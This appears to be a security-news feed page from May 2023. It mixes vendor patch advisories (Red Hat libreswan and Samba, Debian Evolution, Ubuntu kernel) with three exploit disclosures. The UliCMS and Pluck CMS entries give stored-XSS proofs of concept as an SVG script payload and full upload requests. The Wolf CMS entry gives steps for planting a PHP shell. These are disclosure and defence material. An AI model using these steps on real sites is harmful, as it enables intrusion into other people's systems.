UliCMS version 2023-1 Sniffing-Vicuna suffers from a persistent cross site scripting vulnerability.

    #Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)#Application: Ulicms#Version: 2023.1-sniffing-vicuna#Bugs:  Stored Xss#Technology: PHP#Vendor URL: https://en.ulicms.de/#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip#Date of found: 04-05-2023#Author: Mirabbas Ağalarov#Tested on: Linux 2. Technical Details & POC========================================steps: 1. Go to media then to file (http://localhost/dist/admin/index.php?action=files)2. upload malicious svg filesvg file content ===><?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>poc request:POST /dist/admin/fm/upload.php HTTP/1.1Host: localhostContent-Length: 663sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK3CvcSs8xZwzABClX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36sec-ch-ua-platform: "Linux"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/dist/admin/fm/dialog.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: last_position=%2F; 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delvConnection: close------WebKitFormBoundaryK3CvcSs8xZwzABClContent-Disposition: form-data; name="fldr"------WebKitFormBoundaryK3CvcSs8xZwzABClContent-Disposition: form-data; name="files[]"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundaryK3CvcSs8xZwzABCl--3. Go to http://localhost/dist/content/SVG_XSS.svg

UliCMS 2023-1 Sniffing-Vicuna Cross Site Scripting

Red Hat Security Advisory 2023-2137-01 - Samba is an open-source implementation of the Server Message Block protocol and the related Common Internet File System protocol, which allow PC-compatible machines to share files, printers, and various information.

Red Hat Security Advisory 2023-2137-01

Red Hat Security Advisory 2023-2136-01 - Samba is an open-source implementation of the Server Message Block protocol and the related Common Internet File System protocol, which allow PC-compatible machines to share files, printers, and various information.

Red Hat Security Advisory 2023-2136-01

Wolf CMS version 0.8.3.1 suffers from a remote shell upload vulnerability.

    # Exploit Title: Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)# Date: 2023-05-02# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://wolf-cms.readthedocs.io# Software Link: https://github.com/wolfcms/wolfcms# Version: 0.8.3.1# Tested on: Kali Linux### Steps to Reproduce #### Firstly, go to the "Files" tab.# Click on the "Create new file" button and create a php file (e.g:shell.php)# Then, click on the file you created to edit it.# Now, enter your shell code and save the file.# Finally, go to https://localhost/wolfcms/public/shell.php### There's your shell! ###

Wolf CMS 0.8.3.1 Shell Upload

Debian Linux Security Advisory 5396-2 - The webkit2gtk update released as 5396-1 introduced a compatibility problem that caused Evolution to display e-mail incorrectly. Evolution has been updated to solve this issue.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5396-2                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
May 04, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : evolution  
Debian Bug     : 1035469

The webkit2gtk update released as 5396-1 introduced a compatibility  
problem that caused Evolution to display e-mail incorrectly. Evolution  
has been updated to solve this issue.

For the stable distribution (bullseye), this problem has been fixed in  
version 3.38.3-1+deb11u2.

We recommend that you upgrade your evolution packages.

For the detailed security status of evolution please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/evolution

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmRT6FEACgkQAAyEYu0C  
2ALibg/9FWGsSbwd8IEBJ71YIUsRj9arilW4oj2ur4W0mSIINlBuU+LZi+DyBC0r  
NJmSJWbJHyUBpdvNI6bSkSApUXj91oNuNUxZ4sdyGIHgqh/n8yHLOYdTIozA9Dg7  
6EmHBsy864csERzS5yQCD+MTr4d84tjXm9lb5AlZBW+BjrDPwd1GVqzdTKfLddGx  
pQxehkGsthn4B5pjuvrm0byoHtz8o5jhRlq1CEYOv3+nsvG1ea8CM3YXUH9uef2e  
zi4ib77KxI3GthP9l76/lRB+CRrWMjeqzt6zBPHVV7QJ20E+p8KW+rZqoDwoY9n+  
W3iPDbB/KZVh6/vXNoDBBjKs9HrxjTyvGFYvaNEt9qODAAnwQWtDQoA/nufiD+AY  
NlYqLkKuweXBpgoO+L9c9G+9PX+QLuI7ifi6s/v1iAF0jp+/aiS/PR2q+BPRcikd  
0q/Qg0dFdDUkb8snRJTBI44wSkq7jVBLNJ5CKFYjVbjP+bEtHQKtAw3YIC7mto2W  
VxTHIJLkJw1oiiMZqrg2s/tdVb5WwXRaIkW/1MpS3zLUVWKMOOgQCwqM1TzWulsP  
DJdaNHQW+V1POESkbHM6BY6XgXFGrltR/433h7TzVJSKVO2igDfocOL6JIa7hE7l  
x7MRT7aFA50Ao63lUEyHmK1Sz+qA8Ku0rO8g8URI8v0Djy1BCZI=  
=Az5K  
-----END PGP SIGNATURE-----

Debian Security Advisory 5396-2

Pluck CMS version 4.7.18 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS)Application: pluckVersion: 4.7.18Bugs:  XSSTechnology: PHPVendor URL: https://github.com/pluck-cms/pluckSoftware Link: https://github.com/pluck-cms/pluckDate of found: 01-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. create .svg file.2. svg file content:<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>3. upload file (http://localhost/pluck-4.7.18/admin.php?action=files)poc requestPOST /pluck-4.7.18/admin.php?action=files HTTP/1.1Host: localhostContent-Length: 672Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/pluck-4.7.18/admin.php?action=filesAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8deConnection: close------WebKitFormBoundaryJMTiFxESCx7aNqmIContent-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundaryJMTiFxESCx7aNqmIContent-Disposition: form-data; name="submit"Upload------WebKitFormBoundaryJMTiFxESCx7aNqmI--4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg

Pluck CMS 4.7.18 Cross Site Scripting

Ubuntu Security Notice 6056-1 - It was discovered that a race condition existed in the Xen transport layer implementation for the 9P file system protocol in the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or expose sensitive information.

    ==========================================================================Ubuntu Security Notice USN-6056-1May 05, 2023linux-oem-6.1 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:The guest VM system could be made to crash or expose sensitive information.Software Description:- linux-oem-6.1: Linux kernel for OEM systemsDetails:It was discovered that a race condition existed in the Xen transport layerimplementation for the 9P file system protocol in the Linux kernel, leadingto a use-after-free vulnerability. A local attacker could use this to causea denial of service (guest crash) or expose sensitive information (guestkernel memory).Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-6.1.0-1010-oem      6.1.0-1010.10   linux-image-oem-22.04c          6.1.0.1010.10After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6056-1   CVE-2023-1859Package Information:   https://launchpad.net/ubuntu/+source/linux-oem-6.1/6.1.0-1010.10

Ubuntu Security Notice USN-6056-1

Red Hat Security Advisory 2023-2126-01 - Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the Internet Protocol Security and uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks such as virtual private network.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libreswan security update  
Advisory ID:       RHSA-2023:2126-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:2126  
Issue date:        2023-05-04  
CVE Names:         CVE-2023-30570   
=====================================================================

1. Summary:

An update for libreswan is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - aarch64, ppc64le, s390x, x86_64

3. Description:

Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the  
Internet Protocol Security and uses strong cryptography to provide both  
authentication and encryption services. These services allow you to build  
secure tunnels through untrusted networks such as virtual private network  
(VPN).

Security Fix(es):

* libreswan: Malicious IKEv1 Aggressive Mode packets can crash libreswan  
(CVE-2023-30570)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2187165 - CVE-2023-30570 libreswan: Malicious IKEv1 Aggressive Mode packets can crash libreswan

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
libreswan-3.29-7.el8_1.2.src.rpm

aarch64:  
libreswan-3.29-7.el8_1.2.aarch64.rpm  
libreswan-debuginfo-3.29-7.el8_1.2.aarch64.rpm  
libreswan-debugsource-3.29-7.el8_1.2.aarch64.rpm

ppc64le:  
libreswan-3.29-7.el8_1.2.ppc64le.rpm  
libreswan-debuginfo-3.29-7.el8_1.2.ppc64le.rpm  
libreswan-debugsource-3.29-7.el8_1.2.ppc64le.rpm

s390x:  
libreswan-3.29-7.el8_1.2.s390x.rpm  
libreswan-debuginfo-3.29-7.el8_1.2.s390x.rpm  
libreswan-debugsource-3.29-7.el8_1.2.s390x.rpm

x86_64:  
libreswan-3.29-7.el8_1.2.x86_64.rpm  
libreswan-debuginfo-3.29-7.el8_1.2.x86_64.rpm  
libreswan-debugsource-3.29-7.el8_1.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-30570  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZFPxuNzjgjWX9erEAQh+Dg//WziVZjrT5hdmWCcg1QyDTq/e0XzuSJ80  
v3wU/suF/3Iimen9qEFY5WGTziN1iIeQRzDD6BAV4OwEQzf0YKr8CviaRWNfRDSK  
G5EGKALl/AfUdDxQWR7f3IB4yGk/zokdPqHQNIxbM49lIChQaetdmB+wo4fJosyO  
EbDnx5EyrlErQeGRmsMmVosn4VVOJnG6RBLsfUWa/9FzZnepso/K2kA0NRRpzIEa  
+n76yUDSvX4/QbWpZ6zDeTiwY7g1JqRcNYT5Wqypd03/QyowrRT59FzsFm7/eI68  
dtlyiC2uszMJHb/wOgqHNCQ8NZ4lFMNSvrRyLNiC/FC6CoNa/2UsH5luUf3mngnd  
JDNkugJC1NcxUxmIAYm0ytgRS/hy/YyrcfuobMt1lAEAZm8rIJSvJ0gwNZiOghs4  
56GFwuk0WgEApYFSWU72Pp4SafHh8hkR6+1hdpdYo5f2gR9moxPCKQbuGy03Ti3r  
Hq6KyFnBjk+DxR0Bsja6ZMta4yBowicNNq8bF0yrYKOLLs8rmOXQEAleS99LijpI  
0hpRgUEiLakuUmn7bRE/ThJHwphI7lii2wON6efT8yPzNZVffk7kZpSW0HgX0a9o  
PHqY4IUgQjRr8jCR9yjNrAOZEvg6AI0qKnk/VrU1QfhdkQPmGXwEVi0QiuXMlizR  
lzLLoqFkfVc=  
=GVIo  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-2126-01

Red Hat Security Advisory 2023-2124-01 - Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the Internet Protocol Security and uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks such as virtual private network.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libreswan security update  
Advisory ID:       RHSA-2023:2124-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:2124  
Issue date:        2023-05-04  
CVE Names:         CVE-2023-30570   
=====================================================================

1. Summary:

An update for libreswan is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64

3. Description:

Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the  
Internet Protocol Security and uses strong cryptography to provide both  
authentication and encryption services. These services allow you to build  
secure tunnels through untrusted networks such as virtual private network  
(VPN).

Security Fix(es):

* libreswan: Malicious IKEv1 Aggressive Mode packets can crash libreswan  
(CVE-2023-30570)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2187165 - CVE-2023-30570 libreswan: Malicious IKEv1 Aggressive Mode packets can crash libreswan

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
libreswan-3.29-7.el8_2.2.src.rpm

aarch64:  
libreswan-3.29-7.el8_2.2.aarch64.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.aarch64.rpm  
libreswan-debugsource-3.29-7.el8_2.2.aarch64.rpm

ppc64le:  
libreswan-3.29-7.el8_2.2.ppc64le.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.ppc64le.rpm  
libreswan-debugsource-3.29-7.el8_2.2.ppc64le.rpm

s390x:  
libreswan-3.29-7.el8_2.2.s390x.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.s390x.rpm  
libreswan-debugsource-3.29-7.el8_2.2.s390x.rpm

x86_64:  
libreswan-3.29-7.el8_2.2.x86_64.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.x86_64.rpm  
libreswan-debugsource-3.29-7.el8_2.2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
libreswan-3.29-7.el8_2.2.src.rpm

aarch64:  
libreswan-3.29-7.el8_2.2.aarch64.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.aarch64.rpm  
libreswan-debugsource-3.29-7.el8_2.2.aarch64.rpm

ppc64le:  
libreswan-3.29-7.el8_2.2.ppc64le.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.ppc64le.rpm  
libreswan-debugsource-3.29-7.el8_2.2.ppc64le.rpm

s390x:  
libreswan-3.29-7.el8_2.2.s390x.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.s390x.rpm  
libreswan-debugsource-3.29-7.el8_2.2.s390x.rpm

x86_64:  
libreswan-3.29-7.el8_2.2.x86_64.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.x86_64.rpm  
libreswan-debugsource-3.29-7.el8_2.2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
libreswan-3.29-7.el8_2.2.src.rpm

aarch64:  
libreswan-3.29-7.el8_2.2.aarch64.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.aarch64.rpm  
libreswan-debugsource-3.29-7.el8_2.2.aarch64.rpm

ppc64le:  
libreswan-3.29-7.el8_2.2.ppc64le.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.ppc64le.rpm  
libreswan-debugsource-3.29-7.el8_2.2.ppc64le.rpm

s390x:  
libreswan-3.29-7.el8_2.2.s390x.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.s390x.rpm  
libreswan-debugsource-3.29-7.el8_2.2.s390x.rpm

x86_64:  
libreswan-3.29-7.el8_2.2.x86_64.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.x86_64.rpm  
libreswan-debugsource-3.29-7.el8_2.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-30570  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZFPxtNzjgjWX9erEAQi8NhAAk2HzRhscOmVIfgUON7ge2SIWkQ0ye0lf  
6xanBh+lBCPYXRtgzGn8TXrvn/2cw81vMAYZq5TLfFkU6ct45ELCy1p9ehlQr8Ws  
jZKQFetbrJvywvdpwwOGI9H4OYSYCDbmP37PYdUzQNLYzeRxkECpOlfeOJaruVIk  
FGEus7upC33EPP9tBEqzD8qt7aj+wgP/AsYqn+Jn9cYOVEGJC8SymGNvJP6eQFPy  
Ms6AWe+PWX8HtgxgTU68kFWVzaTOZ9WH4zi31iQEK7o9BVkjeAGQmVMHvMRM2UYg  
Uc2G4DmlCEY8BFcCa/zbrDX2jDroTzGsc8VRN8R688S5uNDEMoTRXIk3JKZVIbHZ  
F2Vg4qS5uidBQNGc1yICmQps7Xl0os6qAiSe0KUiCA4WCntmpP/AxqYFIkE3Scwp  
6IiDf0XSlsQQ0jVaS1VuVB/DHsVi7gh+qQwsF0Fc53ptUG8PzJYRj2gIXbWzrfkj  
ytQT5ThxBjuijVRxRBm+/9mTupEDyqzmAKOW9M6sUFxHLXXkaiEqyyhLmkBd2M+w  
bC7dQEC6rDchQsTBI3Ex9nRHq33BM2S3+K9MF/oJMBgBZFrSXO6buzOTqrYkjC00  
ymtm9nRDxzFmxTqcHthSBrDD61MrJK75bsRG/cCdLjyGlxGWVCP1UJ4Y6KQ1XjnZ  
Cjn4Ymyf53U=  
=RPTC  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-2124-01

Red Hat Security Advisory 2023-2121-01 - Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the Internet Protocol Security and uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks such as virtual private network.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libreswan security update  
Advisory ID:       RHSA-2023:2121-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:2121  
Issue date:        2023-05-04  
CVE Names:         CVE-2023-30570   
=====================================================================

1. Summary:

An update for libreswan is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the  
Internet Protocol Security and uses strong cryptography to provide both  
authentication and encryption services. These services allow you to build  
secure tunnels through untrusted networks such as virtual private network  
(VPN).

Security Fix(es):

* libreswan: Malicious IKEv1 Aggressive Mode packets can crash libreswan  
(CVE-2023-30570)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2187165 - CVE-2023-30570 libreswan: Malicious IKEv1 Aggressive Mode packets can crash libreswan

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
libreswan-4.6-3.el9_0.1.src.rpm

aarch64:  
libreswan-4.6-3.el9_0.1.aarch64.rpm  
libreswan-debuginfo-4.6-3.el9_0.1.aarch64.rpm  
libreswan-debugsource-4.6-3.el9_0.1.aarch64.rpm

ppc64le:  
libreswan-4.6-3.el9_0.1.ppc64le.rpm  
libreswan-debuginfo-4.6-3.el9_0.1.ppc64le.rpm  
libreswan-debugsource-4.6-3.el9_0.1.ppc64le.rpm

s390x:  
libreswan-4.6-3.el9_0.1.s390x.rpm  
libreswan-debuginfo-4.6-3.el9_0.1.s390x.rpm  
libreswan-debugsource-4.6-3.el9_0.1.s390x.rpm

x86_64:  
libreswan-4.6-3.el9_0.1.x86_64.rpm  
libreswan-debuginfo-4.6-3.el9_0.1.x86_64.rpm  
libreswan-debugsource-4.6-3.el9_0.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-30570  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZFPxr9zjgjWX9erEAQgpuA//Wj53Qyoa8UhNlIluGDfWsolGCBy9ivqt  
4asgSARByWPrTAYHhLBPkrmBmI8HahJ7vP1sVEgJLkz+/DP2zN6QoqSC+5npxjTf  
QEBVPdQriapBoLODrwd4i3btrcAIp1JnHcMQAZZl+62lw2wcUleg8YkIMTOWhNh1  
0vazCps8AHSNZnR+ABimVEcUgl1USCu2ZpRR+nuRA8/U6uiW0qpjJm9JGqv78D2L  
OoI9AxLWvrjTH8OtEUljNXy4MKkO81qprMZ28bsFQs8NnixZHCyr9nKshHNUfSFE  
LKtLKwCgE3zoVEd+O2vikgHubUlTdtV4bnFgkELryt/cA/AtTI2zuakZ7TUoPn7l  
gNeJ0wmXgUV7JTtAAcSbFQe9tuiZIf2mgc/zGBkfFx/6eIU41ZBmmRqIMWs4nSmf  
Z5j00MQQScp8jThoVWA4q4JDJObHOWjM6T4pC+2Ve0CIQu5eU4u56b+T/UCorVZH  
oZyQDo8+zlJPwxJS2wVcGNt44ngok8ig2/9AlK4H1IeGLNyqr2Efm4d4BxwlmMth  
HOgKvjrsijhLXe/JXtCk1nn3b5kpTFJ3jsgh4wdOLvDMpSmMW0STZLskMdvFZ2hv  
acivXGJEhpZPA4x620jEk8iUkXKYI0gRqhA0ITZ83L5Orct1uCKkbpWZlIsOhaO3  
q9Blzxkvv3Y=  
=N64w  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#linux